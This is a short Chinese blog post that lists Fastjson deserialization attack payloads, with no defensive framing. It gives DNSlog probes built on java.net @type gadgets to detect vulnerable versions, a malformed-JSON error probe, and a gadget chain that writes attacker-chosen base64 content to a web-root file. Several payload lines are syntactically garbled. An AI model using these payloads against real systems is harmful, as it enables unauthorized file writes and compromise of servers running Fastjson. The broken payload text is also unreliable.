首页 > 其他分享 >Fastjson检测和利用

Fastjson检测和利用

时间:2023-04-29 21:12:29浏览次数:39  
标签:Fastjson dnslog java val URL 检测 利用 net type


漏洞检测:
`
DNSlog
{"@type":"java.net.InetAddress","val":"dnslog.cn"} 在49以下才能触发,因为这个gadget在49被禁止了,可用于检测具体版本
{"@type":"java.net.Inet4Address","val":"dnslog"} {"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}} {"@type":"com.alibaba.fastjson.JSONObject",
{"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"} Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:0
`


报错检测:
`
{"xxx":"aaa"
`

文件写入:


`
{ "stream":
{
"@type": "java.lang.AutoCloseable",
"@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream",
"targetPath": "D:/wamp64/www/hacked.txt", \\创建一个空文件
"tempPath": "D:/wamp64/www/test.txt"\\创建一个有内容的文件 },
"writer":
{ "@type": "java.lang.AutoCloseable",
"@type": "com.esotericsoftware.kryo.io.Output",
"buffer": "cHduZWQ=", \\base64后的文件内容
"outputStream": { "$ref": "$.stream" },
"position": 5 },
"close":
{ "@type": "java.lang.AutoCloseable",
"@type": "com.sleepycat.bind.serial.SerialOutput",
"out": { "$ref": "$.writer" } }
}
`

 

标签:Fastjson,dnslog,java,val,URL,检测,利用,net,type
From: https://www.cnblogs.com/0rangecat/p/17364480.html

相关文章

  • 利用snpEff对基因型VCF文件进行变异注释的详细方法
    利用snpEff对VCF文件进行变异注释群体遗传研究中,在获得SNP位点后,我们需要对SNP位点进行注释,对这些SNP位点进行更深的了解。snpEff是一个用于对基因组单核苷酸多态性(SNP)进行注释的软件,snpEff软件可以用于对VCF文件进行变异注释,使用时需要先进行安装,然后构建参考基因组数据库,即......
  • 提供远程网页操作的hta代码,用于不停的检测自已打开句柄被其它open抢占捉取用.
    <!DOCTYPEhtmlPUBLIC"-//W3C//DTDXHTML1.0Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><htmlxmlns="http://www.w3.org/1999/xhtml"><head><metahttp-equiv="Content-......
  • 中文文档图片版面检测
    项目地址:https://github.com/jiangnanboy/layout_analysis模型训练及推理本项目根据开源中文版面数据CDLA,利用yolov8训练两个模型8mpt与8npt,CDLA是一个中文文档版面分析数据集,面向中文文献类(论文)场景。包含以下10个label:正文标题图片图片标题表格表格标题页眉页脚注释公式......
  • 实时人脸检测
    importcv2#加载分类器face_cascade=cv2.CascadeClassifier('haarcascade_frontalface_default.xml')#开启摄像头video_capture=cv2.VideoCapture(0)whileTrue:#读取视频帧ret,frame=video_capture.read()#检查是否成功读取了视频帧......
  • 利用深度学习实现序列模型
    利用深度学习实现序列模型序列问题的含义是接收一个序列作为输入,然后期望预测这个序列的后续。例如继续预测2,4,6,8,10...。这在时间序列中是相当常见的,可以用来预测股市的波动、患者的体温曲线或者赛车所需的加速度。从原理上说,卷积神经网络可以有效处理空间信息,那么循环神经网......
  • 【GPU基础问题】GPU内存占用率很高利用率很低
    前言 问题描述查看nvidia-smi,发现显存占比很高,但是GPU-Util(GPU利用率)很低,在3%、7%、11%等几个参数之间反复跳动。watch-n0.5nvidia-smi也就是显卡并没有完全利用起来,导致训练很慢。原因分析GPU内存占用率(memoryusage) GPU内存利用率(volatileGPU-Util)  ......
  • 最全自动驾驶数据集分享系列三|车道检测数据集
    目前关于自动驾驶数据集你想知道的,应该都在这里了,这是「整数智能」自动驾驶数据集八大系列分享之系列三:「本期划重点」RoadMarking数据集是专门为为评估道路标线检测和识别的性能而设计的数据集,几乎包含了美国道路上所有常见的标记UnsupervisedLlamas数据集是是最大的高质量车道......
  • linux下利用nohup后台运行jar文件包程序
    Linux运行jar包命令如下:方式一: 1.java-jarXXX.jar特点:当前ssh窗口被锁定,可按CTRL+C打断程序运行,或直接关闭窗口,程序退出那如何让窗口不锁定?方式二 1.java-jarXXX.jar&&代表在后台运行。特定:当前ssh窗口不被锁定,但是当窗口关闭时,程序中止运行。继续改......